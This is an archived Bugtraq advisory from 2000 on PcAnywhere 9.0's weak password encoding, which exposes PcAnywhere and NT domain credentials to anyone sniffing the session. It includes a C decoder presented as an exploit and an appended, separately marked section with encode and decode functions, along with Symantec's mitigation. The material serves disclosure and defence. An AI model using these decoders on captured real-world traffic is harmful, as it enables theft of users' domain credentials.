Bugtraq mailing list archives
PcAnywhere weak password encryption
From: longprep () HOTMAIL COM (Pascal Longpre)
Date: Thu, 6 Apr 2000 03:09:58 -0000
PcAnywhere weak password encryption

---- Discussion ----

PcAnywhere 9.0.0 set to its default security value uses a trivial encryption method so user names and passwords are not sent directly in the clear. Since most users have the encryption method set to either "none" or "PcAnyWhere", their passwords are sent with weak encryption.

A major concern lies in the fact that PcAnywhere can authenticate users based on their NT domain accounts and passwords. When the user logs on, they are prompted for their NT username and password. These are then "encrypted" through the PcAnywhere method and decrypted by the host computer for validation by the NT domain controller. Someone snooping on the traffic between the two stations will unlock both the PcAnywhere and NT accounts, all that without even having to go through the L0phtCrack process.

Version 7.0 is not at risk since no encryption is used at all: username and password are sent in the clear. I haven't tested version 8 yet.

--- Solution ---

Symantec says that this was not intended to be real encryption and suggests the use of the Public or Symmetric key option instead. More info can be found at:
http://service1.symantec.com/SUPPORT/pca.nsf/docid/199902231 2571812&src=w

--- Exploit ---

The username / password are contained in a string two packets away from the "Enter your login name" and "Enter your password" prompts. They are preceded by 0x06. The next number is the string length. Here is the code of the exploit:

#include <stdio.h>
#include <string.h>

int main(void)
{
    char password[128];
    char cleartext[128];
    int i;

    // input the sniffed hex values here
    // Encrypted example of the 'aaaaa' password
    password[0] = 0xca;
    password[1] = 0xab;
    password[2] = 0xcb;
    password[3] = 0xa8;
    password[4] = 0xca;
    password[5] = '\0';

    // first byte: fixed offset from the constant 0xca, shifted back to 'a'
    cleartext[0] = 0xca - password[0] + 0x61;
    // remaining bytes: previous wire byte XOR current wire byte XOR (i-1);
    // '-' binds tighter than '^', so the last term is (i-1)
    for (i = 1; i < strlen(password); i++)
        cleartext[i] = password[i-1] ^ password[i] ^ i-1;
    cleartext[strlen(password)] = '\0';

    printf("password is %s \n", cleartext);
    return 0;
}
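To make the point of the post concrete, the following is an added example (not code from the original post or from Symantec): the PcAnywhere 9 transform written out in both directions, the encoding direction being my inversion of the decoder posted above. It assumes that decoder fully describes the scheme. Running decode over encode for arbitrary strings shows that the only fixed inputs are the public constants 0xca and 0x61 and the byte index, so anyone who recorded the session can recover the password with no secret of any kind, which is why the exposure of NT domain credentials is the serious part.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not code from the original post). The PcAnywhere 9
 * "encryption" as inverted from the decoder Pascal Longpre posted, written
 * out in both directions. Assumption: that decoder fully describes the
 * scheme. Nothing here is a key; the constants 0xca and 0x61 and the byte
 * index are all the "secret" there is. */

/* Plaintext -> wire form. Unsigned bytes avoid the sign-extension surprises
 * of plain char with values above 0x7f. */
size_t pca_encode(const unsigned char *plain, size_t len, unsigned char *out)
{
    size_t i;
    if (len == 0)
        return 0;
    out[0] = (unsigned char)(0xca + 0x61 - plain[0]);
    for (i = 1; i < len; i++)
        out[i] = (unsigned char)(out[i - 1] ^ plain[i] ^ (i - 1));
    return len;
}

/* Wire form -> plaintext: the same arithmetic as the posted decoder. */
size_t pca_decode(const unsigned char *wire, size_t len, unsigned char *out)
{
    size_t i;
    if (len == 0)
        return 0;
    out[0] = (unsigned char)(0xca - wire[0] + 0x61);
    for (i = 1; i < len; i++)
        out[i] = (unsigned char)(wire[i - 1] ^ wire[i] ^ (i - 1));
    return len;
}

/* Constructed sample taken from the post: wire form of the password "aaaaa". */
static const unsigned char SAMPLE_WIRE[5] = {0xca, 0xab, 0xcb, 0xa8, 0xca};

/* 1 if the sample decodes to `expected`, else 0. */
int pca_sample_decodes_to(const char *expected)
{
    unsigned char out[sizeof SAMPLE_WIRE];
    pca_decode(SAMPLE_WIRE, sizeof SAMPLE_WIRE, out);
    return strlen(expected) == sizeof SAMPLE_WIRE &&
           memcmp(out, expected, sizeof SAMPLE_WIRE) == 0;
}

/* 1 if encoding `plain` reproduces the sample bytes, else 0. */
int pca_sample_encodes_from(const char *plain)
{
    unsigned char out[sizeof SAMPLE_WIRE];
    if (strlen(plain) != sizeof SAMPLE_WIRE)
        return 0;
    pca_encode((const unsigned char *)plain, sizeof SAMPLE_WIRE, out);
    return memcmp(out, SAMPLE_WIRE, sizeof SAMPLE_WIRE) == 0;
}

/* 1 if decode(encode(plain)) == plain, for any string under 128 bytes. */
int pca_roundtrip_ok(const char *plain)
{
    unsigned char wire[128], back[128];
    size_t len = strlen(plain);
    if (len >= sizeof wire)
        return 0;
    pca_encode((const unsigned char *)plain, len, wire);
    pca_decode(wire, len, back);
    return memcmp(back, plain, len) == 0;
}

int main(void)
{
    unsigned char out[sizeof SAMPLE_WIRE + 1];
    pca_decode(SAMPLE_WIRE, sizeof SAMPLE_WIRE, out);
    out[sizeof SAMPLE_WIRE] = '\0';
    printf("sample decodes to: %s\n", out);
    printf("round trip of \"Secr3t!\": %s\n",
           pca_roundtrip_ok("Secr3t!") ? "ok" : "FAILED");
    return 0;
}
```

Because pca_decode takes nothing but the bytes seen on the wire, the "PcAnyWhere" setting offers no more protection than the "none" setting against anyone positioned to capture the session; the mitigation remains what the post relays from Symantec, namely enabling the Public or Symmetric key option, and, given the NT domain pass-through, not relying on this transport to carry domain credentials.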